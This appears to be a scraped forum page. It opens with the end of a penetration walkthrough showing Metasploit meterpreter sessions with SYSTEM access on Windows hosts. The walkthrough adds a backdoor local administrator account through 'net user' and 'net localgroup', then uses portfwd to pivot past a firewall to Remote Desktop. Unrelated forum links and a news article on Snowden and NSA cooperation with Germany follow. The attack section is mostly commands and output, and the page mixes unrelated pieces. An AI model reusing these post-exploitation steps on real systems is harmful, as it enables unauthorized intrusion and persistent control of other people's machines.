Active sessions
===============

  Id  Type                   Information                               Connection
  --  ----                   -----------                               ----------
  1   meterpreter x86/win32  WIN-UUOFVQRLB13\msec1s @ WIN-UUOFVQRLB13  cwh.dyndns.org:443 -> 203.60.240.180:49160 (203.60.240.180)
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-UUOFVQRLB13     cwh.dyndns.org:8443 -> 203.60.240.180:49161 (203.60.240.180)
  3   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WIN-HDO6QC2QVIV     cwh.dyndns.org:8443 -> 203.60.240.165:50181 (203.60.240.165)

msf auxiliary(psexec_scanner) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-HDO6QC2QVIV
OS              : Windows 2008 R2 (Build 7600).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 2568 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>net user cwh 5plus4=10 /add
net user cwh 5plus4=10 /add
The command completed successfully.

C:\Windows\system32>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\Windows\system32>exit
---------------------------------------------------------------

So we were able to compromise another machine (203.60.240.165). We ran "netstat -an" to view the open ports on the target and found that Remote Desktop (MSRDP, port 3389) was listening, but we could not RDP to it directly because the port was filtered by a firewall. There is a way to bypass this control, though: the "portfwd" command from the Meterpreter shell.

Portfwd is most commonly used as a pivoting technique, allowing direct access to machines that are otherwise unreachable from the attacking system. By running this command on a compromised host that has access to both the attacker and the destination network (or system), we can forward TCP connections through that machine, effectively turning it into a pivot point, much like the port forwarding technique used with an SSH connection. Portfwd relays TCP connections to and from the connected machines.

---------------------------------------------------------------
meterpreter > portfwd add -l 3389 -r 127.0.0.1 -p 3389
[*] Local TCP relay created: 0.0.0.0:3389 <-> 127.0.0.1:3389
---------------------------------------------------------------

Lastly, we used rdesktop to connect to the target server (203.60.240.165) through the forwarded port with the following command:

---------------------------------------------------------------
[zeq3ul@14:02:51]-[~]> rdesktop -u cwh -p 5plus4=10 localhost
---------------------------------------------------------------

FULLY COMPROMISED!! GGWP!

####################
[0x04] - Greetz To
####################

Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2, diF, MaYaSeVeN
Special Thx : Exploit-db.com © Offensive Security 2011

Sursa: Vulnerability analysis, Security Papers, Exploit Tutorials
  23. [h=1]29C3 GSM Cell phone network review[/h] Check out the following: Computer Repair and Security @ Dade City, Zephyrhills, and Tampa by SolidShellSecurity, LLC - IT Security Services, Data Recovery, Computer Repair, Web Hosting, and more! (quality dedicated/vps servers and IT services)
  24. [h=1]29C3 Ethics in Security Research[/h] Check out the following: Computer Repair and Security @ Dade City, Zephyrhills, and Tampa by SolidShellSecurity, LLC - IT Security Services, Data Recovery, Computer Repair, Web Hosting, and more! (quality dedicated/vps servers and IT services)
  25. [h=3]Snowden says NSA works closely with Germany and other Western states for spying[/h]

Author: Mohit Kumar, The Hacker News - Sunday, July 07, 2013

In an interview to be published this week, NSA whistleblower Edward Snowden said the US National Security Agency works closely with Germany and other Western states. The interview was conducted by US cryptography expert Jacob Appelbaum and documentary filmmaker Laura Poitras using encrypted emails, shortly before Snowden became known globally for his whistleblowing.

Snowden said an NSA department known as the Foreign Affairs Directorate coordinates work with foreign secret services. The NSA provides analysis tools for data passing through Germany from regions such as the Middle East. The partnerships are organized so that authorities in other countries can "insulate their political leaders from the backlash" if it becomes public "how grievously they're violating global privacy," he said.

Germans are particularly sensitive about eavesdropping because of the intrusive surveillance in the communist German Democratic Republic (GDR) and during the Nazi era.

The US government has revoked the passport of Snowden, a former NSA contractor who is seeking to evade US justice for leaking details about a vast US electronic surveillance programme to collect phone and Internet data. He has been stranded at a Moscow airport for two weeks, but three Latin American countries have now offered him asylum.

Sursa: Snowden says, NSA works closely with Germany and other Western state for spying - The Hacker News